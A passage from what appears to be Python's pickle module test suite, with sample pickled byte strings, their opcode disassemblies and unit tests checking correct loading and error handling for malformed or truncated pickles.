200: X BINUNICODE 'foo'
208: q BINPUT 11
210: K BININT1 1
212: X BINUNICODE 'bar'
220: q BINPUT 12
222: K BININT1 2
224: u SETITEMS (MARK at 199)
225: b BUILD
226: h BINGET 9
228: t TUPLE (MARK at 112)
229: q BINPUT 13
231: h BINGET 13
233: K BININT1 5
235: e APPENDS (MARK at 3)
236: . STOP
highest protocol among opcodes = 1
"""
DATA2 = (
b'\x80\x02]q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c'
b'__builtin__\ncomplex\n'
b'q\x01G@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x86q\x02Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xff'
b'J\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff'
b'\xff\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00a'
b'bcq\x04h\x04c__main__\nC\nq\x05'
b')\x81q\x06}q\x07(X\x03\x00\x00\x00fooq\x08K\x01'
b'X\x03\x00\x00\x00barq\tK\x02ubh\x06tq\nh'
b'\nK\x05e.'
)
# Disassembly of DATA2
DATA2_DIS = """\
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
6: K BININT1 0
8: K BININT1 1
10: G BINFLOAT 2.0
19: c GLOBAL '__builtin__ complex'
40: q BINPUT 1
42: G BINFLOAT 3.0
51: G BINFLOAT 0.0
60: \x86 TUPLE2
61: q BINPUT 2
63: R REDUCE
64: q BINPUT 3
66: K BININT1 1
68: J BININT -1
73: K BININT1 255
75: J BININT -255
80: J BININT -256
85: M BININT2 65535
88: J BININT -65535
93: J BININT -65536
98: J BININT 2147483647
103: J BININT -2147483647
108: J BININT -2147483648
113: ( MARK
114: X BINUNICODE 'abc'
122: q BINPUT 4
124: h BINGET 4
126: c GLOBAL '__main__ C'
138: q BINPUT 5
140: ) EMPTY_TUPLE
141: \x81 NEWOBJ
142: q BINPUT 6
144: } EMPTY_DICT
145: q BINPUT 7
147: ( MARK
148: X BINUNICODE 'foo'
156: q BINPUT 8
158: K BININT1 1
160: X BINUNICODE 'bar'
168: q BINPUT 9
170: K BININT1 2
172: u SETITEMS (MARK at 147)
173: b BUILD
174: h BINGET 6
176: t TUPLE (MARK at 113)
177: q BINPUT 10
179: h BINGET 10
181: K BININT1 5
183: e APPENDS (MARK at 5)
184: . STOP
highest protocol among opcodes = 2
"""
DATA3 = (
b'\x80\x03]q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c'
b'builtins\ncomplex\nq\x01G'
b'@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00\x86q\x02'
b'Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xffJ\x00\xff'
b'\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff\xff\xff\x7f'
b'J\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00abcq'
b'\x04h\x04c__main__\nC\nq\x05)\x81q'
b'\x06}q\x07(X\x03\x00\x00\x00barq\x08K\x02X\x03\x00'
b'\x00\x00fooq\tK\x01ubh\x06tq\nh\nK\x05'
b'e.'
)
# Disassembly of DATA3
DATA3_DIS = """\
0: \x80 PROTO 3
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
6: K BININT1 0
8: K BININT1 1
10: G BINFLOAT 2.0
19: c GLOBAL 'builtins complex'
37: q BINPUT 1
39: G BINFLOAT 3.0
48: G BINFLOAT 0.0
57: \x86 TUPLE2
58: q BINPUT 2
60: R REDUCE
61: q BINPUT 3
63: K BININT1 1
65: J BININT -1
70: K BININT1 255
72: J BININT -255
77: J BININT -256
82: M BININT2 65535
85: J BININT -65535
90: J BININT -65536
95: J BININT 2147483647
100: J BININT -2147483647
105: J BININT -2147483648
110: ( MARK
111: X BINUNICODE 'abc'
119: q BINPUT 4
121: h BINGET 4
123: c GLOBAL '__main__ C'
135: q BINPUT 5
137: ) EMPTY_TUPLE
138: \x81 NEWOBJ
139: q BINPUT 6
141: } EMPTY_DICT
142: q BINPUT 7
144: ( MARK
145: X BINUNICODE 'bar'
153: q BINPUT 8
155: K BININT1 2
157: X BINUNICODE 'foo'
165: q BINPUT 9
167: K BININT1 1
169: u SETITEMS (MARK at 144)
170: b BUILD
171: h BINGET 6
173: t TUPLE (MARK at 110)
174: q BINPUT 10
176: h BINGET 10
178: K BININT1 5
180: e APPENDS (MARK at 5)
181: . STOP
highest protocol among opcodes = 2
"""
DATA4 = (
b'\x80\x04\x95\xa8\x00\x00\x00\x00\x00\x00\x00]\x94(K\x00K\x01G@'
b'\x00\x00\x00\x00\x00\x00\x00\x8c\x08builtins\x94\x8c\x07'
b'complex\x94\x93\x94G@\x08\x00\x00\x00\x00\x00\x00G'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x86\x94R\x94K\x01J\xff\xff\xff\xffK'
b'\xffJ\x01\xff\xff\xffJ\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ'
b'\x00\x00\xff\xffJ\xff\xff\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80('
b'\x8c\x03abc\x94h\x06\x8c\x08__main__\x94\x8c'
b'\x01C\x94\x93\x94)\x81\x94}\x94(\x8c\x03bar\x94K\x02\x8c'
b'\x03foo\x94K\x01ubh\nt\x94h\x0eK\x05e.'
)
# Disassembly of DATA4
DATA4_DIS = """\
0: \x80 PROTO 4
2: \x95 FRAME 168
11: ] EMPTY_LIST
12: \x94 MEMOIZE
13: ( MARK
14: K BININT1 0
16: K BININT1 1
18: G BINFLOAT 2.0
27: \x8c SHORT_BINUNICODE 'builtins'
37: \x94 MEMOIZE
38: \x8c SHORT_BINUNICODE 'complex'
47: \x94 MEMOIZE
48: \x93 STACK_GLOBAL
49: \x94 MEMOIZE
50: G BINFLOAT 3.0
59: G BINFLOAT 0.0
68: \x86 TUPLE2
69: \x94 MEMOIZE
70: R REDUCE
71: \x94 MEMOIZE
72: K BININT1 1
74: J BININT -1
79: K BININT1 255
81: J BININT -255
86: J BININT -256
91: M BININT2 65535
94: J BININT -65535
99: J BININT -65536
104: J BININT 2147483647
109: J BININT -2147483647
114: J BININT -2147483648
119: ( MARK
120: \x8c SHORT_BINUNICODE 'abc'
125: \x94 MEMOIZE
126: h BINGET 6
128: \x8c SHORT_BINUNICODE '__main__'
138: \x94 MEMOIZE
139: \x8c SHORT_BINUNICODE 'C'
142: \x94 MEMOIZE
143: \x93 STACK_GLOBAL
144: \x94 MEMOIZE
145: ) EMPTY_TUPLE
146: \x81 NEWOBJ
147: \x94 MEMOIZE
148: } EMPTY_DICT
149: \x94 MEMOIZE
150: ( MARK
151: \x8c SHORT_BINUNICODE 'bar'
156: \x94 MEMOIZE
157: K BININT1 2
159: \x8c SHORT_BINUNICODE 'foo'
164: \x94 MEMOIZE
165: K BININT1 1
167: u SETITEMS (MARK at 150)
168: b BUILD
169: h BINGET 10
171: t TUPLE (MARK at 119)
172: \x94 MEMOIZE
173: h BINGET 14
175: K BININT1 5
177: e APPENDS (MARK at 13)
178: . STOP
highest protocol among opcodes = 4
"""
# set([1,2]) pickled from 2.x with protocol 2
DATA_SET = b'\x80\x02c__builtin__\nset\nq\x00]q\x01(K\x01K\x02e\x85q\x02Rq\x03.'
# xrange(5) pickled from 2.x with protocol 2
DATA_XRANGE = b'\x80\x02c__builtin__\nxrange\nq\x00K\x00K\x05K\x01\x87q\x01Rq\x02.'
# a SimpleCookie() object pickled from 2.x with protocol 2
DATA_COOKIE = (b'\x80\x02cCookie\nSimpleCookie\nq\x00)\x81q\x01U\x03key'
b'q\x02cCookie\nMorsel\nq\x03)\x81q\x04(U\x07commentq\x05U'
b'\x00q\x06U\x06domainq\x07h\x06U\x06secureq\x08h\x06U\x07'
b'expiresq\th\x06U\x07max-ageq\nh\x06U\x07versionq\x0bh\x06U'
b'\x04pathq\x0ch\x06U\x08httponlyq\rh\x06u}q\x0e(U\x0b'
b'coded_valueq\x0fU\x05valueq\x10h\x10h\x10h\x02h\x02ubs}q\x11b.')
# set([3]) pickled from 2.x with protocol 2
DATA_SET2 = b'\x80\x02c__builtin__\nset\nq\x00]q\x01K\x03a\x85q\x02Rq\x03.'
python2_exceptions_without_args = (
ArithmeticError,
AssertionError,
AttributeError,
BaseException,
BufferError,
BytesWarning,
DeprecationWarning,
EOFError,
EnvironmentError,
Exception,
FloatingPointError,
FutureWarning,
GeneratorExit,
IOError,
ImportError,
ImportWarning,
IndentationError,
IndexError,
KeyError,
KeyboardInterrupt,
LookupError,
MemoryError,
NameError,
NotImplementedError,
OSError,
OverflowError,
PendingDeprecationWarning,
ReferenceError,
RuntimeError,
RuntimeWarning,
# StandardError is gone in Python 3, we map it to Exception
StopIteration,
SyntaxError,
SyntaxWarning,
SystemError,
SystemExit,
TabError,
TypeError,
UnboundLocalError,
UnicodeError,
UnicodeWarning,
UserWarning,
ValueError,
Warning,
ZeroDivisionError,
)
exception_pickle = b'\x80\x02cexceptions\n?\nq\x00)Rq\x01.'
# UnicodeEncodeError object pickled from 2.x with protocol 2
DATA_UEERR = (b'\x80\x02cexceptions\nUnicodeEncodeError\n'
b'q\x00(U\x05asciiq\x01X\x03\x00\x00\x00fooq\x02K\x00K\x01'
b'U\x03badq\x03tq\x04Rq\x05.')
def create_data():
c = C()
c.foo = 1
c.bar = 2
x = [0, 1, 2.0, 3.0+0j]
# Append some integer test cases at cPickle.c's internal size
# cutoffs.
uint1max = 0xff
uint2max = 0xffff
int4max = 0x7fffffff
x.extend([1, -1,
uint1max, -uint1max, -uint1max-1,
uint2max, -uint2max, -uint2max-1,
int4max, -int4max, -int4max-1])
y = ('abc', 'abc', c, c)
x.append(y)
x.append(y)
x.append(5)
return x
class AbstractUnpickleTests(unittest.TestCase):
# Subclass must define self.loads.
_testdata = create_data()
def assert_is_copy(self, obj, objcopy, msg=None):
"""Utility method to verify if two objects are copies of each others.
"""
if msg is None:
msg = "{!r} is not a copy of {!r}".format(obj, objcopy)
self.assertEqual(obj, objcopy, msg=msg)
self.assertIs(type(obj), type(objcopy), msg=msg)
if hasattr(obj, '__dict__'):
self.assertDictEqual(obj.__dict__, objcopy.__dict__, msg=msg)
self.assertIsNot(obj.__dict__, objcopy.__dict__, msg=msg)
if hasattr(obj, '__slots__'):
self.assertListEqual(obj.__slots__, objcopy.__slots__, msg=msg)
for slot in obj.__slots__:
self.assertEqual(
hasattr(obj, slot), hasattr(objcopy, slot), msg=msg)
self.assertEqual(getattr(obj, slot, None),
getattr(objcopy, slot, None), msg=msg)
def check_unpickling_error(self, errors, data):
with self.subTest(data=data), \
self.assertRaises(errors):
try:
self.loads(data)
except BaseException as exc:
if support.verbose > 1:
print('%-32r - %s: %s' %
(data, exc.__class__.__name__, exc))
raise
def test_load_from_data0(self):
self.assert_is_copy(self._testdata, self.loads(DATA0))
def test_load_from_data1(self):
self.assert_is_copy(self._testdata, self.loads(DATA1))
def test_load_from_data2(self):
self.assert_is_copy(self._testdata, self.loads(DATA2))
def test_load_from_data3(self):
self.assert_is_copy(self._testdata, self.loads(DATA3))
def test_load_from_data4(self):
self.assert_is_copy(self._testdata, self.loads(DATA4))
def test_load_classic_instance(self):
# See issue5180. Test loading 2.x pickles that
# contain an instance of old style class.
for X, args in [(C, ()), (D, ('x',)), (E, ())]:
xname = X.__name__.encode('ascii')
# Protocol 0 (text mode pickle):
"""
0: ( MARK
1: i INST '__main__ X' (MARK at 0)
13: p PUT 0
16: ( MARK
17: d DICT (MARK at 16)
18: p PUT 1
21: b BUILD
22: . STOP
"""
pickle0 = (b"(i__main__\n"
b"X\n"
b"p0\n"
b"(dp1\nb.").replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle0))
# Protocol 1 (binary mode pickle)
"""
0: ( MARK
1: c GLOBAL '__main__ X'
13: q BINPUT 0
15: o OBJ (MARK at 0)
16: q BINPUT 1
18: } EMPTY_DICT
19: q BINPUT 2
21: b BUILD
22: . STOP
"""
pickle1 = (b'(c__main__\n'
b'X\n'
b'q\x00oq\x01}q\x02b.').replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle1))
# Protocol 2 (pickle2 = b'\x80\x02' + pickle1)
"""
0: \x80 PROTO 2
2: ( MARK
3: c GLOBAL '__main__ X'
15: q BINPUT 0
17: o OBJ (MARK at 2)
18: q BINPUT 1
20: } EMPTY_DICT
21: q BINPUT 2
23: b BUILD
24: . STOP
"""
pickle2 = (b'\x80\x02(c__main__\n'
b'X\n'
b'q\x00oq\x01}q\x02b.').replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle2))
def test_maxint64(self):
maxint64 = (1 << 63) - 1
data = b'I' + str(maxint64).encode("ascii") + b'\n.'
got = self.loads(data)
self.assert_is_copy(maxint64, got)
# Try too with a bogus literal.
data = b'I' + str(maxint64).encode("ascii") + b'JUNK\n.'
self.check_unpickling_error(ValueError, data)
def test_unpickle_from_2x(self):
# Unpickle non-trivial data from Python 2.x.
loaded = self.loads(DATA_SET)
self.assertEqual(loaded, set([1, 2]))
loaded = self.loads(DATA_XRANGE)
self.assertEqual(type(loaded), type(range(0)))
self.assertEqual(list(loaded), list(range(5)))
loaded = self.loads(DATA_COOKIE)
self.assertEqual(type(loaded), SimpleCookie)
self.assertEqual(list(loaded.keys()), ["key"])
self.assertEqual(loaded["key"].value, "value")
# Exception objects without arguments pickled from 2.x with protocol 2
for exc in python2_exceptions_without_args:
data = exception_pickle.replace(b'?', exc.__name__.encode("ascii"))
loaded = self.loads(data)
self.assertIs(type(loaded), exc)
# StandardError is mapped to Exception, test that separately
loaded = self.loads(exception_pickle.replace(b'?', b'StandardError'))
self.assertIs(type(loaded), Exception)
loaded = self.loads(DATA_UEERR)
self.assertIs(type(loaded), UnicodeEncodeError)
self.assertEqual(loaded.object, "foo")
self.assertEqual(loaded.encoding, "ascii")
self.assertEqual(loaded.start, 0)
self.assertEqual(loaded.end, 1)
self.assertEqual(loaded.reason, "bad")
def test_load_python2_str_as_bytes(self):
# From Python 2: pickle.dumps('a\x00\xa0', protocol=0)
self.assertEqual(self.loads(b"S'a\\x00\\xa0'\n.",
encoding="bytes"), b'a\x00\xa0')
# From Python 2: pickle.dumps('a\x00\xa0', protocol=1)
self.assertEqual(self.loads(b'U\x03a\x00\xa0.',
encoding="bytes"), b'a\x00\xa0')
# From Python 2: pickle.dumps('a\x00\xa0', protocol=2)
self.assertEqual(self.loads(b'\x80\x02U\x03a\x00\xa0.',
encoding="bytes"), b'a\x00\xa0')
def test_load_python2_unicode_as_str(self):
# From Python 2: pickle.dumps(u'π', protocol=0)
self.assertEqual(self.loads(b'V\\u03c0\n.',
encoding='bytes'), 'π')
# From Python 2: pickle.dumps(u'π', protocol=1)
self.assertEqual(self.loads(b'X\x02\x00\x00\x00\xcf\x80.',
encoding="bytes"), 'π')
# From Python 2: pickle.dumps(u'π', protocol=2)
self.assertEqual(self.loads(b'\x80\x02X\x02\x00\x00\x00\xcf\x80.',
encoding="bytes"), 'π')
def test_load_long_python2_str_as_bytes(self):
# From Python 2: pickle.dumps('x' * 300, protocol=1)
self.assertEqual(self.loads(pickle.BINSTRING +
struct.pack("<I", 300) +
b'x' * 300 + pickle.STOP,
encoding='bytes'), b'x' * 300)
def test_constants(self):
self.assertIsNone(self.loads(b'N.'))
self.assertIs(self.loads(b'\x88.'), True)
self.assertIs(self.loads(b'\x89.'), False)
self.assertIs(self.loads(b'I01\n.'), True)
self.assertIs(self.loads(b'I00\n.'), False)
def test_empty_bytestring(self):
# issue 11286
empty = self.loads(b'\x80\x03U\x00q\x00.', encoding='koi8-r')
self.assertEqual(empty, '')
def test_short_binbytes(self):
dumped = b'\x80\x03C\x04\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
def test_binbytes(self):
dumped = b'\x80\x03B\x04\x00\x00\x00\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
@requires_32b
def test_negative_32b_binbytes(self):
# On 32-bit builds, a BINBYTES of 2**31 or more is refused
dumped = b'\x80\x03B\xff\xff\xff\xffxyzq\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_negative_32b_binunicode(self):
# On 32-bit builds, a BINUNICODE of 2**31 or more is refused
dumped = b'\x80\x03X\xff\xff\xff\xffxyzq\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
def test_short_binunicode(self):
dumped = b'\x80\x04\x8c\x04\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), '\u20ac\x00')
def test_misc_get(self):
self.check_unpickling_error(KeyError, b'g0\np0')
self.assert_is_copy([(100,), (100,)],
self.loads(b'((Kdtp0\nh\x00l.))'))
def test_binbytes8(self):
dumped = b'\x80\x04\x8e\4\0\0\0\0\0\0\0\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
def test_binunicode8(self):
dumped = b'\x80\x04\x8d\4\0\0\0\0\0\0\0\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), '\u20ac\x00')
def test_bytearray8(self):
dumped = b'\x80\x05\x96\x03\x00\x00\x00\x00\x00\x00\x00xxx.'
self.assertEqual(self.loads(dumped), bytearray(b'xxx'))
@requires_32b
def test_large_32b_binbytes8(self):
dumped = b'\x80\x04\x8e\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_large_32b_bytearray8(self):
dumped = b'\x80\x05\x96\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_large_32b_binunicode8(self):
dumped = b'\x80\x04\x8d\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
def test_get(self):
pickled = b'((lp100000\ng100000\nt.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_binget(self):
pickled = b'(]q\xffh\xfft.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_long_binget(self):
pickled = b'(]r\x00\x00\x01\x00j\x00\x00\x01\x00t.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_dup(self):
pickled = b'((l2t.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_negative_put(self):
# Issue #12847
dumped = b'Va\np-1\n.'
self.check_unpickling_error(ValueError, dumped)
@requires_32b
def test_negative_32b_binput(self):
# Issue #12847
dumped = b'\x80\x03X\x01\x00\x00\x00ar\xff\xff\xff\xff.'
self.check_unpickling_error(ValueError, dumped)
def test_badly_escaped_string(self):
self.check_unpickling_error(ValueError, b"S'\\'\n.")
def test_badly_quoted_string(self):
# Issue #17710
badpickles = [b"S'\n.",
b'S"\n.',
b'S\' \n.',
b'S" \n.',
b'S\'"\n.',
b'S"\'\n.',
b"S' ' \n.",
b'S" " \n.',
b"S ''\n.",
b'S ""\n.',
b'S \n.',
b'S\n.',
b'S.']
for p in badpickles:
self.check_unpickling_error(pickle.UnpicklingError, p)
def test_correctly_quoted_string(self):
goodpickles = [(b"S''\n.", ''),
(b'S""\n.', ''),
(b'S"\\n"\n.', '\n'),
(b"S'\\n'\n.", '\n')]
for p, expected in goodpickles:
self.assertEqual(self.loads(p), expected)
def test_frame_readline(self):
pickled = b'\x80\x04\x95\x05\x00\x00\x00\x00\x00\x00\x00I42\n.'
# 0: \x80 PROTO 4
# 2: \x95 FRAME 5
# 11: I INT 42
# 15: . STOP
self.assertEqual(self.loads(pickled), 42)
def test_compat_unpickle(self):
# xrange(1, 7)
pickled = b'\x80\x02c__builtin__\nxrange\nK\x01K\x07K\x01\x87R.'
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), range)
self.assertEqual(unpickled, range(1, 7))
self.assertEqual(list(unpickled), [1, 2, 3, 4, 5, 6])
# reduce
pickled = b'\x80\x02c__builtin__\nreduce\n.'
self.assertIs(self.loads(pickled), functools.reduce)
# whichdb.whichdb
pickled = b'\x80\x02cwhichdb\nwhichdb\n.'
self.assertIs(self.loads(pickled), dbm.whichdb)
# Exception(), StandardError()
for name in (b'Exception', b'StandardError'):
pickled = (b'\x80\x02cexceptions\n' + name + b'\nU\x03ugh\x85R.')
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), Exception)
self.assertEqual(str(unpickled), 'ugh')
# UserDict.UserDict({1: 2}), UserDict.IterableUserDict({1: 2})
for name in (b'UserDict', b'IterableUserDict'):
pickled = (b'\x80\x02(cUserDict\n' + name +
b'\no}U\x04data}K\x01K\x02ssb.')
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), collections.UserDict)
self.assertEqual(unpickled, collections.UserDict({1: 2}))
def test_bad_stack(self):
badpickles = [
b'.', # STOP
b'0', # POP
b'1', # POP_MARK
b'2', # DUP
b'(2',
b'R', # REDUCE
b')R',
b'a', # APPEND
b'Na',
b'b', # BUILD
b'Nb',
b'd', # DICT
b'e', # APPENDS
b'(e',
b'ibuiltins\nlist\n', # INST
b'l', # LIST
b'o', # OBJ
b'(o',
b'p1\n', # PUT
b'q\x00', # BINPUT
b'r\x00\x00\x00\x00', # LONG_BINPUT
b's', # SETITEM
b'Ns',
b'NNs',
b't', # TUPLE
b'u', # SETITEMS
b'(u',
b'}(Nu',
b'\x81', # NEWOBJ
b')\x81',
b'\x85', # TUPLE1
b'\x86', # TUPLE2
b'N\x86',
b'\x87', # TUPLE3
b'N\x87',
b'NN\x87',
b'\x90', # ADDITEMS
b'(\x90',
b'\x91', # FROZENSET
b'\x92', # NEWOBJ_EX
b')}\x92',
b'\x93', # STACK_GLOBAL
b'Vlist\n\x93',
b'\x94', # MEMOIZE
]
for p in badpickles:
self.check_unpickling_error(self.bad_stack_errors, p)
def test_bad_mark(self):
badpickles = [
b'N(.', # STOP
b'N(2', # DUP
b'cbuiltins\nlist\n)(R', # REDUCE
b'cbuiltins\nlist\n()R',
b']N(a', # APPEND
# BUILD
b'cbuiltins\nValueError\n)R}(b',
b'cbuiltins\nValueError\n)R(}b',
b'(Nd', # DICT
b'N(p1\n', # PUT
b'N(q\x00', # BINPUT
b'N(r\x00\x00\x00\x00', # LONG_BINPUT
b'}NN(s', # SETITEM
b'}N(Ns',
b'}(NNs',
b'}((u', # SETITEMS
b'cbuiltins\nlist\n)(\x81', # NEWOBJ
b'cbuiltins\nlist\n()\x81',
b'N(\x85', # TUPLE1
b'NN(\x86', # TUPLE2
b'N(N\x86',
b'NNN(\x87', # TUPLE3
b'NN(N\x87',
b'N(NN\x87',
b']((\x90', # ADDITEMS
# NEWOBJ_EX
b'cbuiltins\nlist\n)}(\x92',
b'cbuiltins\nlist\n)(}\x92',
b'cbuiltins\nlist\n()}\x92',
# STACK_GLOBAL
b'Vbuiltins\n(Vlist\n\x93',
b'Vbuiltins\nVlist\n(\x93',
b'N(\x94', # MEMOIZE
]
for p in badpickles:
self.check_unpickling_error(self.bad_stack_errors, p)
def test_truncated_data(self):
self.check_unpickling_error(EOFError, b'')
self.check_unpickling_error(EOFError, b'N')
badpickles = [
b'B', # BINBYTES
b'B\x03\x00\x00',
b'B\x03\x00\x00\x00',
b'B\x03\x00\x00\x00ab',
b'C', # SHORT_BINBYTES
b'C\x03',
b'C\x03ab',
b'F', # FLOAT
b'F0.0',
b'F0.00',
b'G', # BINFLOAT
b'G\x00\x00\x00\x00\x00\x00\x00',
b'I', # INT
b'I0',
b'J', # BININT
b'J\x00\x00\x00',
b'K', # BININT1
b'L', # LONG
b'L0',
b'L10',
b'L0L',
b'L10L',
b'M', # BININT2
b'M\x00',
# b'P', # PERSID
# b'Pabc',
b'S', # STRING
b"S'abc'",
b'T', # BINSTRING
b'T\x03\x00\x00',
b'T\x03\x00\x00\x00',
b'T\x03\x00\x00\x00ab',
b'U', # SHORT_BINSTRING
b'U\x03',
b'U\x03ab',
b'V', # UNICODE
b'Vabc',
b'X', # BINUNICODE
b'X\x03\x00\x00',
b'X\x03\x00\x00\x00',
b'X\x03\x00\x00\x00ab',
b'(c', # GLOBAL
b'(cbuiltins',
b'(cbuiltins\n',
b'(cbuiltins\nlist',
b'Ng', # GET
b'Ng0',
b'(i', # INST
b'(ibuiltins',
b'(ibuiltins\n',
b'(ibuiltins\nlist',
b'Nh', # BINGET
b'Nj', # LONG_BINGET
b'Nj\x00\x00\x00',
b'Np', # PUT
b'Np0',
b'Nq', # BINPUT
b'Nr', # LONG_BINPUT
b'Nr\x00\x00\x00',
b'\x80', # PROTO
b'\x82', # EXT1
b'\x83', # EXT2
b'\x84\x01',
b'\x84', # EXT4
b'\x84\x01\x00\x00',
b'\x8a', # LONG1
b'\x8b', # LONG4
b'\x8b\x00\x00\x00',
b'\x8c', # SHORT_BINUNICODE
b'\x8c\x03',
b'\x8c\x03ab',
b'\x8d', # BINUNICODE8
b'\x8d\x03\x00\x00\x00\x00\x00\x00',
b'\x8d\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x8d\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x8e', # BINBYTES8
b'\x8e\x03\x00\x00\x00\x00\x00\x00',
b'\x8e\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x8e\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x96', # BYTEARRAY8
b'\x96\x03\x00\x00\x00\x00\x00\x00',
b'\x96\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x96\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x95', # FRAME
b'\x95\x02\x00\x00\x00\x00\x00\x00',
b'\x95\x02\x00\x00\x00\x00\x00\x00\x00',
b'\x95\x02\x00\x00\x00\x00\x00\x00\x00N',
]
for p in badpickles:
self.check_unpickling_error(self.truncated_errors, p)
@reap_threads
def test_unpickle_module_race(self):
# https://bugs.python.org/issue34572
locker_module = dedent("""
import threading
barrier = threading.Barrier(2)
""")
locking_import_module = dedent("""
import locker
locker.barrier.wait()
class ToBeUnpickled(object):
pass
""")
os.mkdir(TESTFN)
self.addCleanup(shutil.rmtree, TESTFN)
sys.path.insert(0, TESTFN)
self.addCleanup(sys.path.remove, TESTFN)
with open(os.path.join(TESTFN, "locker.py"), "wb") as f:
f.write(locker_module.encode('utf-8'))
with open(os.path.join(TESTFN, "locking_import.py"), "wb") as f:
f.write(locking_import_module.encode('utf-8'))
self.addCleanup(forget, "locker")
self.addCleanup(forget, "locking_import")
import locker
pickle_bytes = (
b'\x80\x03clocking_import\nToBeUnpickled\nq\x00)\x81q\x01.')
# Then try to unpickle two of these simultaneously
# One of them will cause the module import, and we want it to block
# until the other one either:
# - fails (before the patch for this issue)
# - blocks on the import lock for the module, as it should
results = []
barrier = threading.Barrier(3)
def t():
# This ensures the threads have all started
# presumably barrier release is faster than thread startup
barrier.wait()
results.append(pickle.loads(pickle_bytes))
t1 = threading.Thread(target=t)
t2 = threading.Thread(target=t)
t1.start()
t2.start()
barrier.wait()
# could have delay here
locker.barrier.wait()
t1.join()
t2.join()
from locking_import import ToBeUnpickled
self.assertEqual(
[type(x) for x in results],
[ToBeUnpickled] * 2)
class AbstractPickleTests(unittest.TestCase):
# Subclass must define self.dumps, self.loads.
optimized = False
_testdata = AbstractUnpickleTests._testdata
def setUp(self):
pass
assert_is_copy = AbstractUnpickleTests.assert_is_copy
def test_misc(self):
# test various datatypes not tested by testdata
for proto in protocols:
x = myint(4)
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
x = (1, ())
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
x = initarg(1, x)
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
# XXX test __reduce__ protocol?
def test_roundtrip_equality(self):
expected = self._testdata
for proto in protocols:
s = self.dumps(expected, proto)
got = self.loads(s)
self.assert_is_copy(expected, got)
# There are gratuitous differences between pickles produced by
# pickle and cPickle, largely because cPickle starts PUT indices at
# 1 and pickle starts them at 0. See XXX comment in cPickle's put2() --
# there's a comment with an exclamation point there whose meaning
# is a mystery. cPickle also suppresses PUT for objects with a refcount
# of 1.
def dont_test_disassembly(self):
from io import StringIO
from pickletools import dis
for proto, expected in (0, DATA0_DIS), (1, DATA1_DIS):
s = self.dumps(self._testdata, proto)
filelike = StringIO()
dis(s, out=filelike)
got = filelike.getvalue()
self.assertEqual(expected, got)
def test_recursive_list(self):
l = []
l.append(l)
for proto in protocols:
s = self.dumps(l, proto)
x = self.loads(s)
self.assertIsInstance(x, list)
self.assertEqual(len(x), 1)
self.assertIs(x[0], x)
def test_recursive_tuple_and_list(self):
t = ([],)
t[0].append(t)
for proto in protocols:
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], list)
self.assertEqual(len(x[0]), 1)
self.assertIs(x[0][0], x)
def test_recursive_dict(self):
d = {}
d[1] = d
for proto in protocols:
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, dict)
self.assertEqual(list(x.keys()), [1])
self.assertIs(x[1], x)
def test_recursive_dict_key(self):
d = {}
k = K(d)
d[k] = 1
for proto in protocols:
s = self.dumps(d, proto)
x = self.loads(s)
